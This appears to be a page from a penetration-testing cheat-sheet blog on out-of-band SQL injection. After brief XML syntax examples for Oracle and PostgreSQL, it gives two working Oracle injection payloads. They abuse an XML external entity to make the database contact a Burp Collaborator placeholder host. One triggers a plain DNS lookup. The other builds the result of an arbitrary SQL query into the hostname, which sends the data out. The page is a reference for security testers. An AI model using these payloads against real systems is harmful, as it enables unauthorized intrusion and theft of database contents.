> For the complete documentation index, see [llms.txt](https://blog.s1rn3tz.ovh/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://blog.s1rn3tz.ovh/pentest-web/injections/sqli/out-of-band.md).

# Out-Of-Band

## Synthaxe XML integration

<table><thead><tr><th></th><th></th></tr></thead><tbody><tr><td>Oracle</td><td><pre><code>SELECT XMLTYPE('&#x3C;?xml version="1.0"?>&#x3C;document>&#x3C;employee>John&#x3C;/employee>&#x3C;/document>') 
FROM dual;
</code></pre></td></tr><tr><td>PostgreSQL</td><td><pre><code>SELECT XMLPARSE(DOCUMENT '&#x3C;?xml version="1.0"?>&#x3C;document>&#x3C;employee>John&#x3C;/employee>&#x3C;/document>');
</code></pre></td></tr></tbody></table>

## Simple DNS lookup

```sql
' UNION SELECT EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l') FROM dual--
```

## Data exfiltration

```sql
' UNION SELECT EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(<SQL_QUERY_HERE>)||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l') FROM dual--
```

<figure><img src="/files/H1Aq5C0ziuC1PorxpeY3" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/4PJLDpYHepelHKGzIJxe" alt=""><figcaption></figcaption></figure>
